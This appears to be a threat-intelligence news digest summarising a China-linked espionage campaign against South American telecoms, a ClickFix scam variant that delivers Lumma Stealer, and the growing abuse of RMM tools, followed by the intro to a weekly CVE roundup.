Trending Topics

China-Linked APT UAT-9244 Breaches South American Telecoms with a Malware Campaign

A China-linked threat group known as UAT-9244 is aggressively targeting telecommunications providers across South America with a sophisticated malware toolkit designed for persistence, espionage, and stealth. Active since 2024, the group is believed to share operational patterns with espionage outfits like FamousSparrow and Tropic Trooper, according to new research from Cisco Talos. UAT-9244 employs a three-pronged attack strategy featuring both Windows and Linux implants to compromise endpoints and network edge devices. Its first tool, TernDoor, uses DLL side-loading via a seemingly harmless executable, “wsprint[.]exe,” to decrypt and launch its payload, allowing remote command execution, file management, and system reconnaissance while disabling security defenses. A built-in uninstall switch (“-u”) allows attackers to erase evidence with a single command. The second component, PeerTime, or “angrypeer,” is a Linux backdoor that leverages the BitTorrent protocol to communicate with C2 infrastructure, share payloads among infected peers, and propagate via BusyBox utilities. BruteEntry, the third element, is a Go-based brute-force scanner deployed on compromised network devices, turning them into relay nodes that perform large-scale SSH, Postgres, and Tomcat scans for further intrusion. On Windows systems, persistence is achieved through hidden scheduled tasks and modified registry keys. Combined, these tools form a resilient attack chain that enables UAT-9244 to infiltrate, expand, and maintain access to critical telecom networks; a clear signal of escalating state-sponsored cyber operations targeting global communication infrastructure.

ClickFix Scam Evolves: Attackers Hijack Windows Terminal to Deploy Lumma Stealer

A new evolution of the long-running ClickFix scam is manipulating Windows users into launching Windows Terminal and pasting malicious commands themselves, handing control to the Lumma Stealer malware. According to Microsoft Threat Intelligence, this latest campaign, active since February, modifies the traditional ClickFix technique, which previously used the Win + R “Run” dialog, by now abusing the Windows + X → I shortcut to open Windows Terminal instead, sidestepping common security detections. The scam lures victims through fake verification pages or CAPTCHA prompts that instruct them to copy and paste a seemingly harmless command for troubleshooting or connection checks. In reality, the encoded command launches a multi-step PowerShell script that downloads a disguised 7-Zip utility, extracts malicious components, disables Microsoft Defender protections, and installs Lumma Stealer to harvest login credentials from Chrome and Edge. A secondary version of the campaign drops a VBScript payload that is executed via native Windows tools like MSBuild, even reaching out to blockchain infrastructure in a tactic known as EtherHiding, before executing the same credential theft process. The enduring success of ClickFix lies in simple human deception, tricking users into running the infection chain themselves. Microsoft’s report highlights how the attackers are adapting the old formula to exploit trust in legitimate tools, betting that most people won’t question commands executed inside Windows Terminal.

Weaponizing Trust: The Rise of RMM Abuse in Modern Cyber Attacks

Cybercriminals are increasingly exploiting trusted RMM tools to evade detection, maintain persistence, and execute attacks under the guise of legitimate IT activity. By embedding themselves within trusted administrative software, attackers gain hands-on keyboard access that often slips past EDR controls. The Huntress 2026 Cyber Threat Report reveals a 277% surge in RMM abuse in 2025, underscoring how adversaries now favor convenience over creating custom malware. Most compromises begin with social engineering; phishing emails impersonating e-signature requests, invoices, or voicemail alerts that trick users into installing malicious RMM agents. Once inside, attackers can automate tasks, move laterally, and launch ransomware in under an hour, especially when targeting Managed Service Providers to reach multiple downstream clients in a single supply chain attack. Defending against this trend demands behavioral monitoring rather than blind trust in approved software; security teams must baseline normal activity, flag unusual script execution, and enforce strict allowlists for authorized remote tools. Fingerprinting known RMM executables, verifying connection endpoints, and treating unrecognized remote sessions as potential intrusions are essential. Beyond technology, cultivating a vigilant workforce through ongoing security awareness training remains critical; employees who report suspicious activity can halt an attack before it evolves from infiltration to impact.

Top CVEs of the Week

Top CVEs of the Week – As part of our ongoing vulnerability monitoring, the following CVEs highlight recent security issues that could affect a range of systems, applications, and devices. These findings reflect the constantly evolving threat landscape and reinforce the importance of timely patching, secure configurations, and proactive security practices. Below is a summary of notable vulnerabilities, including their impact and any available remediation guidance.